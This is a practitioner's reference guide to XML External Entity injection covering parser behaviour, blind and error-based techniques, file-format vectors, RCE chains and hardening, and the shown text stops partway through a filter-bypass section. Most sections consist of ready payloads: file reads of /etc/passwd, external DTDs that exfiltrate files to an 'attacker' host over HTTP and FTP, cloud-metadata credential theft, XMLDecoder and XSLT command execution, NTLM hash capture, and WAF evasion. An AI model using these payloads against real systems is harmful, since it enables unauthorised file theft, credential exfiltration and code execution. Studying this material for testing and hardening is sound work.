Comprehensive XXE Guide

A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 40 research sources.

Fundamentals
Attack Surface & Entry Points
Classic In-Band XXE
Blind XXE via External DTD
Error-Based XXE
Parameter Entities & Local DTD Chains
XXE → SSRF Pivoting
XXE → File Read & Information Disclosure
XXE → RCE
Parser-Specific Behaviors
XML File-Format Vectors
WAF & Filter Bypasses
Denial of Service
Real-World CVEs & Chains
Tooling
Detection & Prevention
Payload Quick Reference

1. Fundamentals

XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE.

Three classes:

Class	Description	Example
In-Band	Entity value reflected directly in response	XML-to-JSON converters, stock-lookup APIs
Blind / OOB	No reflection — data exfiltrated via DNS/HTTP/FTP to attacker DTD	SVG/DOCX processors, async workers
Error-Based	Content leaked through parser exception messages	Spring Boot `500` handlers, lxml `XMLSyntaxError`

Impact spectrum: DNS/HTTP callback → Arbitrary file read → Source code disclosure → Cloud metadata / IMDS token theft → Internal service enumeration → Credential capture (SMB hash) → Remote code execution (PHP expect, Java XMLDecoder, XSLT).

1.1 The XML DTD primer

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ELEMENT root ANY>
  <!ENTITY internal "literal value">
  <!ENTITY external SYSTEM "file:///etc/passwd">
  <!ENTITY % param  SYSTEM "http://attacker/evil.dtd">
]>
<root>&external;</root>

<!DOCTYPE …> — declares the document type and internal subset.
<!ELEMENT …> — declares allowed element structure (rarely required).
<!ENTITY name "value"> — general entity, referenced as &name; inside the document body.
<!ENTITY name SYSTEM "URI"> — external general entity, parser fetches the URI.
<!ENTITY % name …> — parameter entity, referenced as %name; inside the DTD only. Cannot appear inside the document body.
%name; inside the internal subset is the primitive behind blind and error-based XXE.

1.2 Entity reference rules that matter for exploitation

A general entity reference (&y;) is not expanded inside a SYSTEM identifier, so a general entity cannot splice data into another entity's URI. In <!ENTITY x SYSTEM "http://host/?q=&y;"> the parser treats &y; as literal URI text.
Parameter entities (%x;) can be used to concatenate text into other declarations — the basis of the “evil.dtd” trick.
Inside the internal subset, a parameter-entity reference may appear only between declarations, never inside one (XML 1.0 well-formedness constraint "PEs in Internal Subset"), hence external DTDs are used to host the indirection.
Systems that blend internal + external DTDs allow redefinition of an entity originally declared externally — the key to local-DTD / error-based chains.
SYSTEM URIs may be file://, http://, https://, ftp://, gopher://, jar:, netdoc:, data:, php://…, expect://.

1.3 Why it’s still everywhere

XML is deep in legacy plumbing (SOAP, SAML, WS-Security, XMPP, RSS/Atom, Office Open XML, SVG, XLIFF, XMP, RDF, PDF metadata, Kubernetes API fallback, Android app processing).
Many parsers still default to permissive DTD handling or are routinely configured that way (libxml2 with LIBXML_DTDLOAD | LIBXML_NOENT, Java SAX/DOM factories left at their JAXP defaults, .NET Framework 4.5.1 and earlier, old Nokogiri).
“JSON only” APIs often accept XML via Content-Type: application/xml or text/xml as an undocumented fallback — valuable injection points.
File-format fuzzers routinely uncover XXE in image/document processors that unzip Office documents behind the scenes.

2. Attack Surface & Entry Points

2.1 Request-level sinks

Category	Examples
XML request bodies	`Content-Type: application/xml`, `text/xml`, `application/soap+xml`, `application/xliff+xml`
JSON → XML conversion	APIs that accept both; toggle `Content-Type: application/xml` on a JSON endpoint
SOAP / WS-* endpoints	Legacy integrations, admin APIs, invoice/billing, enterprise middleware
SAML SSO	SAMLResponse, AuthnRequest, IdP metadata upload
RSS / Atom feeds	“Import feed”, link preview, social aggregators
File uploads	SVG avatars, DOCX/XLSX/PPTX importers, XMP images, EPUB, XLIFF, XFA PDF forms
XInclude points	Server-side XML templating where the DOCTYPE can’t be controlled but XML fragments can
Webhook/CI	XML build manifests, Maven POM, Gradle module metadata, `.csproj`, `.xib`, `.storyboard`
Printer/orchestration APIs	JMF (Job Messaging Format) on port 4004, XFDF, Xerox FreeFlow
SCADA / industrial	Batch job XML, OPC UA fallback, manufacturing execution systems

2.2 Code-level sinks

Java     javax.xml.parsers.DocumentBuilderFactory / SAXParserFactory
         javax.xml.transform.TransformerFactory
         javax.xml.validation.SchemaFactory
         javax.xml.stream.XMLInputFactory
         javax.xml.xpath.XPathFactory
         java.beans.XMLDecoder          -- deserialization → RCE
         org.jdom2.input.SAXBuilder
         org.dom4j.io.SAXReader
.NET     System.Xml.XmlDocument (with XmlUrlResolver)
         System.Xml.XmlTextReader       -- pre-4.5.2 defaults dangerous
         System.Xml.XmlReader + XmlReaderSettings { DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }
         System.Xml.XPath.XPathDocument
         System.Xml.Linq.XDocument (pre-4.5.2)
         System.Xml.Serialization.XmlSerializer
Python   xml.etree.ElementTree          -- expat-based; does not expand external entities (raises ParseError)
         lxml.etree (libxml2)           -- parameter-entity XXE until 5.4.0
         xml.dom.minidom
         xml.sax
         xmltodict                      -- wraps expat
PHP      libxml (SimpleXMLElement, DOMDocument, XMLReader)
         -- LIBXML_NOENT enables entity substitution (dangerous)
Ruby     Nokogiri                       -- DTDLOAD/NOENT opt-in required
         REXML                          -- XML bomb protection, still resolves ENTITY
Node.js  libxmljs, xml2js (with explicitArray/DOCTYPE allowed), xmldom, fast-xml-parser
Go       encoding/xml                   -- does not resolve SYSTEM, generally safe
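
As a quick check of the xml.etree.ElementTree entry above, the following sketch (Python standard library only) feeds the parser a document that declares and references an external general entity. The sample document and the helper name try_parse are illustrative assumptions; CPython is expected to raise ParseError instead of reading the file, but the behaviour is worth confirming on the interpreter actually deployed.

```python
import xml.etree.ElementTree as ET

# Illustrative document: declares an external general entity and references it.
SAMPLE = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/hostname">]>'
    '<r>&x;</r>'
)


def try_parse(xml_text: str) -> str:
    """Return 'parsed' on success, otherwise the ParseError message."""
    try:
        ET.fromstring(xml_text)
        return "parsed"
    except ET.ParseError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(try_parse(SAMPLE))
    print(try_parse("<r>ok</r>"))
```

The same harness can be pointed at any other Python parser wrapper to compare behaviour before trusting a "safe by default" label.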

2.3 Content-Type smuggling

If a POST endpoint accepts JSON, try swapping the body:

POST /api/order HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://collab/xxe">]>
<order><item>&x;</item></order>

Burp extension Content Type Converter automates the JSON→XML flip.
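
The JSON→XML flip can also be scripted. The sketch below is one possible mapping (object keys become element names, list items become <item> elements); the function name json_to_xml and the mapping itself are assumptions, since each server framework has its own idea of how JSON fields correspond to XML elements.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(body: str, root_tag: str = "root") -> str:
    """Convert a JSON document into a simple XML string (assumed mapping)."""

    def build(parent: ET.Element, value) -> None:
        if isinstance(value, dict):
            for key, child in value.items():
                # Assumes every key is a valid XML element name.
                build(ET.SubElement(parent, str(key)), child)
        elif isinstance(value, list):
            for item in value:
                build(ET.SubElement(parent, "item"), item)
        elif value is not None:
            parent.text = str(value)

    root = ET.Element(root_tag)
    build(root, json.loads(body))
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print(json_to_xml('{"item": "42"}', root_tag="order"))
```

The converted body is then sent with Content-Type: application/xml; any DOCTYPE has to be prepended by hand, because ElementTree does not emit one.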

3. Classic In-Band XXE

When the parser reflects the entity value in the HTTP response, file disclosure is one request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
  <storeId>1</storeId>
</stockCheck>

When the parser rejects undeclared elements, add an ANY declaration:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ELEMENT stockCheck ANY>
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
</stockCheck>

3.1 XInclude — DOCTYPE-less injection

Useful when the server builds the outer XML and only lets you inject a small fragment (e.g. a productId field that is inlined into a SOAP envelope):

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Requires an XInclude-aware parser. In Java: DocumentBuilderFactory.setXIncludeAware(true) or XOM/dom4j defaults.

3.2 Directory listing (Java file:// quirk)

libxml2 and the Java file: URL handler list directory contents when the URI points at a folder:

<!DOCTYPE r [<!ENTITY dir SYSTEM "file:///etc/">]>
<r>&dir;</r>

Java returns a newline-separated listing; libxml2 returns a text rendering. Use for filesystem enumeration before switching to targeted reads.

4. Blind XXE via External DTD

No reflection? Force the parser to fetch an attacker-hosted DTD and chain parameter entities.

4.1 Step 1 — prove external connectivity

<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY % ping SYSTEM "http://collab.example/"> %ping;]>
<r/>

If the Burp Collaborator / interact.sh receives a hit, the parser resolves parameter entities and will fetch remote DTDs.

4.2 Step 2 — chain a parameter entity for OOB exfil

Hosted at http://attacker/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker/x?d=%file;'>">
%eval;
%exfil;

Victim payload:

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY % xxe SYSTEM "http://attacker/evil.dtd"> %xxe;]>
<r/>

Flow: victim parser fetches evil.dtd → defines %file → %eval builds %exfil dynamically → %exfil makes an HTTP GET with the file contents in the query string.

4.3 FTP for multi-line files

HTTP URL parsers strip newlines. For files like /etc/passwd use FTP, where the file contents ride as the password in the URI:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'ftp://a:%file;@attacker/x'>">
%all;
%send;

Pair with a dummy FTP listener (e.g. ONsec xxe-ftp-server.rb) that logs the PASS command without actually handshaking.

4.4 Gopher (legacy Java ≤ 1.7)

<!ENTITY % send SYSTEM "gopher://attacker:1337/?%file;">

Effectively extinct in modern deployments but still useful on embedded Java or ancient appliances.

4.5 DNS-only exfiltration

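When only outbound DNS is allowed, encode one file-byte per subdomain via iterative XXE or use a tool like XXEinjector to chunk. For simple fingerprinting a bare DNS lookup is enough. Use a unique static label per test; the parser performs no shell-style substitution, so a value such as $(id) would be resolved literally:

<!ENTITY % p SYSTEM "http://xxe-probe-01.dns.attacker.tld/">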

5. Error-Based XXE

Used when OOB is blocked (egress filtered) but the app surfaces parser errors.

5.1 External-DTD error variant

<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

The parser tries to open file:///nonexistent/<contents of /etc/passwd>, fails, and embeds the missing-path string in the exception thrown back to the client.

5.2 Purely local (no egress) — local DTD trick

PortSwigger / Arseniy Sharoglazov’s technique: find a DTD that already exists on the server filesystem whose entities can be redefined from the internal subset.

Canonical example (GNOME yelp):

<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<r/>

%ISOamso; is redefined to inject additional declarations; when %local_dtd; is expanded the injected entities fire and produce the error.

Other high-hit local DTDs (see GoSecure dtd-finder for full list):

Path	Overridable entity
`/usr/share/yelp/dtd/docbookx.dtd`	`ISOamso`
`/usr/share/xml/fontconfig/fonts.dtd`	`constant`
`/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd`	various
`/opt/IBM/WebSphere/AppServer/properties/schemas/j2ee/XMLSchema.dtd`	WebSphere
`/usr/share/java/xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties`	Xalan
`C:\Windows\System32\wbem\xml\cim20.dtd`	Windows

Brute-force the DTD path with Intruder using the dtd_files.txt wordlist from the GoSecure repo.

5.3 GoSecure `dtd-finder`

java -jar dtd-finder.jar /path/to/docker-image.tar

Scans a tarball/Docker image for DTDs and automatically identifies entities that can be overridden. Point at the target’s base image to build a custom payload list.
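
For a first pass on an already-extracted filesystem, a rough approximation of the idea can be sketched in Python. This is not dtd-finder's algorithm: it only lists parameter entities declared in *.dtd files, and each hit still has to be checked by hand for whether it is referenced somewhere that makes it overridable. The function name and regular expression are assumptions.

```python
import os
import re
import tempfile

# Matches parameter-entity declarations such as: <!ENTITY % ISOamso ...>
PARAM_ENTITY = re.compile(r"<!ENTITY\s+%\s+([A-Za-z_:][\w.:-]*)")


def find_param_entities(root_dir: str) -> dict[str, list[str]]:
    """Map each *.dtd file under root_dir to the parameter entities it declares."""
    found: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".dtd"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                names = PARAM_ENTITY.findall(fh.read())
            if names:
                found[path] = sorted(set(names))
    return found


if __name__ == "__main__":
    # Self-contained demo on a throwaway directory.
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "sample.dtd"), "w", encoding="utf-8") as fh:
            fh.write('<!ENTITY % ISOamso "INCLUDE">\n<!ENTITY plain "x">\n')
        for path, names in find_param_entities(tmp).items():
            print(os.path.basename(path), names)
```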

6. Parameter Entities & Local DTD Chains

Understanding the parameter-entity gymnastics is essential because almost every advanced XXE variant boils down to:

Define %file that reads the target.
Define %eval that — when expanded — declares a third entity whose URI concatenates %file’s value.
Expand %eval, then expand the generated entity.

6.1 Character-reference encoding

Because % and & inside the internal subset are parsed immediately, you must delay their evaluation. Use character references:

Literal	Delayed form
`%`	`&#x25;`
`&`	`&#x26;`
`%` (one more level)	`&#x26;#x25;`

Rule of thumb: each additional layer of delayed expansion re-escapes the leading & as &#x26;.
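
The layering rule can be sketched in a few lines of Python. The helper names delay and expand_once are assumptions, and html.unescape is used only as a rough stand-in for one round of character-reference expansion; a real XML parser applies stricter rules.

```python
import html


def delay(text: str, layers: int = 1) -> str:
    """Escape '&' and '%' as character references, once per layer."""
    for _ in range(layers):
        # Escape '&' first so the '&' of a freshly written '&#x25;'
        # is not escaped again within the same layer.
        text = text.replace("&", "&#x26;").replace("%", "&#x25;")
    return text


def expand_once(text: str) -> str:
    """Approximate one parser pass that resolves character references."""
    return html.unescape(text)


if __name__ == "__main__":
    for layers in (1, 2):
        print(layers, delay("%file;", layers))
```

Peeling one layer off a two-layer string with expand_once gives the one-layer form, which mirrors how each nested entity declaration consumes one level of escaping.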

6.2 Double-encoded payload template

<!ENTITY % outer '
  <!ENTITY &#x25; file   SYSTEM "file:///flag">
  <!ENTITY &#x25; wrap   "<!ENTITY &#x26;#x25; leak SYSTEM &#x27;http://a/?x=&#x25;file;&#x27;>">
  &#x25;wrap;
  &#x25;leak;
'>
%outer;

6.3 lxml “meow://” trick (libxml2 bypass of 5.4.0 hardening)

lxml 5.4.0 blocked error-based parameter entities, but when the underlying libxml2 is older than 2.13.8, general entities built from parameter entities still leak via a bogus scheme:

<!DOCTYPE colors [
  <!ENTITY % a '
    <!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
  '>
  %a; %b;
]>
<colors>&c;</colors>

The parser reports failed to load external entity "meow://FLAG{secret}" — flag in error message, no egress needed.

Fixed in lxml ≥ 5.4.0 and libxml2 ≥ 2.13.8. Either alone is not sufficient.

7. XXE → SSRF Pivoting

Every XXE is an SSRF primitive. The http:// scheme inside a SYSTEM URI forces the server to issue an outbound request.

7.1 Cloud metadata exfil

AWS (IMDSv1):

<!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

GCP:

<!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">

Note: GCP IMDS requires Metadata-Flavor: Google header — XXE typically can’t set request headers, so GCP is usually a dead end unless the parser uses a custom HTTP client that forwards request headers.

Azure IMDS:

<!ENTITY az SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">

Azure also requires Metadata: true header — usually blocked, same caveat as GCP.

IMDSv2 on AWS requires a PUT to get a token — blocks naive XXE. If the backend still permits IMDSv1 via HttpTokens=optional, exploitation stays trivial.

7.2 Internal port scan / service enumeration

Error/response timing differences reveal open vs closed ports:

<!ENTITY scan SYSTEM "http://10.0.0.5:6379/">

Redis/Memcached/Elasticsearch without auth can sometimes be driven via gopher smuggling, though XXE alone lacks CRLF control.

7.3 JMF / print orchestration (Xerox FreeFlow Core)

Real case: a JMF listener on TCP/4004 parsed XML without hardening. A crafted JMF DOCTYPE with a SYSTEM entity caused the server to issue outbound HTTP, confirming SSRF. Chained with a subsequent path traversal, it led to unauthenticated RCE.

<?xml version="1.0"?>
<!DOCTYPE JMF [<!ENTITY probe SYSTEM "http://collab/oob">]>
<JMF SenderID="t" Version="1.3"><Query Type="KnownMessages">&probe;</Query></JMF>

8. XXE → File Read & Information Disclosure

8.1 High-value target files (Linux)

/etc/passwd               /etc/shadow (rarely readable)
/etc/hosts /etc/resolv.conf
/proc/self/environ        env vars, often contain secrets & tokens
/proc/self/cmdline        full process command line
/proc/self/cwd/<file>     relative-path access
/proc/self/net/tcp        open sockets
/proc/self/status
/proc/version /etc/issue  fingerprinting
/proc/1/maps              memory mappings
/root/.ssh/id_rsa /root/.aws/credentials  if root-run
/var/lib/kubelet/config.yaml
/run/secrets/kubernetes.io/serviceaccount/token

8.2 Windows

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Windows\System32\inetsrv\config\applicationHost.config
file://attacker-smb-share/a.jpg  → NetNTLMv2 hash capture via Responder

8.3 Binary & non-ASCII file read

Raw file:// breaks on non-XML-safe bytes. Wrap in base64 via PHP filter:

<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">

Java: wrap the read inside a CDATA block via a two-stage entity construction (XXEinjector --cdata mode).

8.4 Source code recovery

PHP filters cover the filesystem; combine with .git/config, .svn/wc.db, composer.json, framework configs to rebuild source trees.

9. XXE → RCE

9.1 PHP `expect://` wrapper

If the expect extension is loaded:

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]>
<r>&x;</r>

Rare in the wild — pecl expect is almost never deployed — but still worth testing when PHP fingerprint is confirmed.

9.2 Java XMLDecoder deserialization

java.beans.XMLDecoder.readObject() processes XML that instantiates arbitrary classes. If an app exposes it to user input, it’s instant RCE (not strictly XXE but frequently conflated because the entry point is XML).

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <array class="java.lang.String" length="3">
        <void index="0"><string>/bin/sh</string></void>
        <void index="1"><string>-c</string></void>
        <void index="2"><string>id &gt; /tmp/p</string></void>
      </array>
    </void>
  </object>
</java>

Real CVE targets: Oracle WebLogic CVE-2017-10271, Restlet XMLDecoder endpoints.

9.3 XSLT → Java RCE via Xalan

If you can control a stylesheet (or feed XSLT to a Transformer):

<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
  xmlns:str="http://xml.apache.org/xalan/java/java.lang.String">
  <xsl:template match="/">
    <xsl:variable name="cmd">touch /tmp/pwn</xsl:variable>
    <xsl:variable name="rt" select="rt:getRuntime()"/>
    <xsl:variable name="p"  select="rt:exec($rt,$cmd)"/>
  </xsl:template>
</xsl:stylesheet>

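Extension functions are reachable whenever the Transformer is created without FEATURE_SECURE_PROCESSING and jdk.xml.enableExtensionFunctions has not been set to false; verify the default for the JDK build in use.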

9.4 `jar:` protocol → file-write → RCE chain

Java’s jar:http://… handler downloads a ZIP to /tmp/…, extracts it, reads a member, then deletes the archive. Hanging the HTTP server indefinitely keeps the temp file alive. Combined with a second vulnerability (LFI, template injection, deserialization, XSLT upload) this yields RCE.

<!ENTITY x SYSTEM "jar:http://attacker:8080/evil.zip!/marker.txt">

Workshop tooling: slow_http_server.py / slowserver.jar from GoSecure xxe-workshop.

9.5 NetNTLMv2 capture (Windows)

<!ENTITY x SYSTEM "file:////attacker/share/a.jpg">

Run Responder.py -I eth0 on the attacker host, capture the NetNTLMv2 hash, crack with hashcat -m 5600.

10. Parser-Specific Behaviors

10.1 libxml2 (PHP, Python lxml, Ruby Nokogiri, many C/C++ apps)

External entity resolution is off by default since 2.9.0 unless LIBXML_NOENT or LIBXML_DTDLOAD is set.
PHP’s libxml_disable_entity_loader(true) was the historical fix (deprecated in PHP 8).
Parameter-entity expansion continued even with “safe” settings until 2.13.8.
Directory listing via file:///etc/ supported.

10.2 Xerces (Java SAX/DOM)

DocumentBuilderFactory / SAXParserFactory still default to entity resolution enabled unless features explicitly disabled.
Hardening flags (all must be set):
- http://apache.org/xml/features/disallow-doctype-decl → true (best defence)
- http://xml.org/sax/features/external-general-entities → false
- http://xml.org/sax/features/external-parameter-entities → false
- http://apache.org/xml/features/nonvalidating/load-external-dtd → false
- FEATURE_SECURE_PROCESSING → true
- setXIncludeAware(false); setExpandEntityReferences(false)
TransformerFactory, SchemaFactory, XPathFactory, Validator, SAXTransformerFactory each need independent hardening via ACCESS_EXTERNAL_DTD / ACCESS_EXTERNAL_STYLESHEET / ACCESS_EXTERNAL_SCHEMA.

10.3 .NET

API	Default (pre-4.5.2)	Default (4.5.2+)
`XmlDocument`	`XmlUrlResolver` present — vulnerable	`XmlResolver = null` — safe
`XmlTextReader`	`ProhibitDtd = false` — vulnerable	`DtdProcessing = Prohibit` — safe
`XmlReader` (via `XmlReader.Create`)	`DtdProcessing = Prohibit` — safe	safe
`XPathDocument`	dangerous	fixed
`XDocument` / `XElement`	uses XmlReader internally — generally safe	safe

Always dangerous regardless of version: setting XmlResolver = new XmlUrlResolver() or DtdProcessing = Parse with non-null resolver.

Look for these patterns in C# code review:

var rdr = new XmlTextReader(input);
rdr.XmlResolver = new XmlUrlResolver();           // BAD
rdr.DtdProcessing = DtdProcessing.Parse;          // BAD

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Parse,          // BAD
    XmlResolver  = new XmlUrlResolver(),          // BAD
    MaxCharactersFromEntities = 0                 // enables unbounded billion-laughs
};

The same default-configuration mistake on the Java side (see 10.2): CVE-2025-27136 in the LocalS3 Java S3 emulator used a default DocumentBuilderFactory on the CreateBucketConfiguration endpoint, letting unauthenticated attackers read /etc/passwd.

10.4 Python lxml

Safe mode: etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True).
Parameter-entity XXE viable before lxml 5.4.0 / libxml2 2.13.8, even with resolve_entities=False, when load_dtd=True.
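defusedxml provides drop-in replacements for the stdlib parsers that reject entity declarations and external references by default, and reject any DOCTYPE when called with forbid_dtd=True. Recommended.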

10.5 Nokogiri (Ruby)

Safe by default. Dangerous only when DTDLOAD | NOENT passed:

Nokogiri::XML(input) { |c| c.dtdload.noent }   # BAD

REXML::Document — inherits from ruby-stdlib; patches since 2013 cap recursion but general entities still expand.

10.6 Go `encoding/xml`

Does not resolve SYSTEM entities. Historically considered safe.
Custom decoders (etree, html-xml-tools) can still be coaxed to fetch DTDs — review any third-party XML lib on Go.

11. XML File-Format Vectors

Any file whose internals contain XML is an XXE delivery vehicle.

11.1 SVG (file upload)

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">
  <text>&x;</text>
</svg>

Or <image xlink:href="file:///etc/hostname"/>. Works against ImageMagick (prior to policy.xml hardening), librsvg, Inkscape, Apache Batik, many cloud image processors.

11.2 Office Open XML (DOCX, XLSX, PPTX)

unzip foo.docx -d foo/
Edit foo/word/document.xml (or xl/workbook.xml) — insert <!DOCTYPE …> with payload between the XML prolog and the root element.
cd foo && zip -r ../evil.docx .
Upload to the target’s document-processing feature (resume parsers, invoice ingest, doc-to-PDF).
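
The flip side of these steps is easy to check for on the receiving end. The sketch below (standard library only) lists the XML members of a ZIP-based upload that contain a DOCTYPE; the function names and the suffix list are assumptions, and the byte search is a heuristic that covers UTF-8 and UTF-16 but not every encoding trick.

```python
import io
import zipfile

# "<!DOCTYPE" as it appears in UTF-8/ASCII and in both UTF-16 byte orders.
NEEDLES = ["<!DOCTYPE".encode(enc) for enc in ("utf-8", "utf-16-le", "utf-16-be")]
XML_SUFFIXES = (".xml", ".rels")  # assumed set of XML-bearing members


def build_zip(files: dict[str, bytes]) -> bytes:
    """Demo helper: pack {member name: content} into an in-memory ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def members_with_doctype(container: bytes) -> list[str]:
    """Return names of XML members that contain a DOCTYPE declaration."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(container)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            data = zf.read(info)  # no size cap here; add one before real use
            if any(needle in data for needle in NEEDLES):
                hits.append(info.filename)
    return hits


if __name__ == "__main__":
    sample = build_zip({
        "[Content_Types].xml": b"<Types/>",
        "word/document.xml": b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x "y">]><r/>',
    })
    print(members_with_doctype(sample))
```

Legitimate Office documents normally carry no DOCTYPE at all, so any hit is a strong reason to reject the upload before it reaches a parser.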

11.3 XLIFF (translation files)

Typical consumers: Apache Tika, Okapi, XLIFF Toolbox. Example that worked against a Java 1.8 parser:

<?xml version="1.0"?>
<!DOCTYPE XXE [<!ENTITY % remote SYSTEM "http://attacker/evil.dtd"> %remote;]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"/>

11.4 PDF (XFA forms, XMP metadata)

Acrobat XFA forms wrap XML; PDF metadata (/Metadata stream) carries an XMP packet. Many server-side PDF handlers (iText, PDFBox, Ghostscript) parse these.

11.5 EPUB, ODF

EPUB is a ZIP containing XHTML + OPF XML. ODF (LibreOffice) is a ZIP of content.xml / styles.xml. Both have historical XXE CVEs in reader software.

11.6 SVG / MathML embedded in HTML

If an HTML sanitizer passes SVG through unchanged and a later stage parses it with an XML parser, XXE is reachable even when the primary input is HTML.

11.7 SOAP envelopes

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo><![CDATA[<!DOCTYPE d [<!ENTITY % r SYSTEM "http://a/e.dtd"> %r;]><d/>]]></foo>
  </soap:Body>
</soap:Envelope>

CDATA wrapping sometimes bypasses outer sanitization.

11.8 SAML

SAMLResponse XML is base64-encoded before transport — decode, inject DOCTYPE, re-encode. Signature validation may invalidate the payload unless the IdP-trust relationship allows a re-signed document; however many SPs parse the XML before signature verification (classic XSW-style bugs), making XXE trivially reachable.

11.9 RSS / Atom

Feed-ingest services (Feedly-like, Slack preview bots, Hootsuite) routinely fetch user URLs and parse RSS. Host a poisoned feed and wait.

11.10 Android / iOS asset bundles

Android manifest, .xib, .storyboard, .plist (XML variant) — XXE reached via supply-chain build tooling has produced numerous CI takeovers.

12. WAF & Filter Bypasses

12.1 Encoding

UTF-7 / UTF-16: re-encode payload, declare encoding="UTF-7" in the prolog. Many WAFs only inspect UTF-8.
HTML numeric entities inside the DTD to obscure the DOCTYPE/ENTITY keywords (the parser resolves them before interpreting).
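Comment injection: place XML comments (<!-- ... -->) between DTD declarations to break up the byte sequences that signature-based filters match on.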

12.2 Scheme alternatives

Blocked	Alternative
`file:///etc/passwd`	`netdoc:///etc/passwd` (Java)
`file://`	`jar:file:///`
`http://`	`https://`, `ftp://`, `gopher://`
`SYSTEM` keyword filtered	`PUBLIC "-//W3C//DTD..." "URI"` — PUBLIC identifiers also trigger fetches

12.3 `data://` smuggling

<!DOCTYPE r [<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init;]><r/>

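If the parser resolves data: URIs, the base64 inside decodes at parse time and effectively imports an arbitrary DTD payload past string-based filters. The sample value above decodes to the string file:///etc/passwd, so treat it as a placeholder: a working payload carries base64-encoded DTD declarations.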
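
What the parser would actually receive from such a URI can be checked offline. In this sketch SAMPLE_URI is copied from the payload above, while data_uri_payload and to_data_uri are hypothetical helper names.

```python
import base64

# Copied from the payload above.
SAMPLE_URI = "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"


def data_uri_payload(uri: str) -> bytes:
    """Return the decoded bytes that follow the 'base64,' marker."""
    _, marker, encoded = uri.partition("base64,")
    if not marker:
        raise ValueError("not a base64 data: URI")
    return base64.b64decode(encoded)


def to_data_uri(dtd_text: str) -> str:
    """Wrap DTD text in the same URI shape as SAMPLE_URI (hypothetical helper)."""
    encoded = base64.b64encode(dtd_text.encode("utf-8")).decode("ascii")
    return "data://text/plain;base64," + encoded


if __name__ == "__main__":
    print(data_uri_payload(SAMPLE_URI))
```

The same decoder is useful on the defensive side for inspecting data: URIs found in logged request bodies.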

12.4 Nested general-entity bypass via HTML entities

From Ambrotd/XXE-Notes — obfuscate the inner ENTITY so regex filters on SYSTEM and % don’t match:

<!DOCTYPE foo [
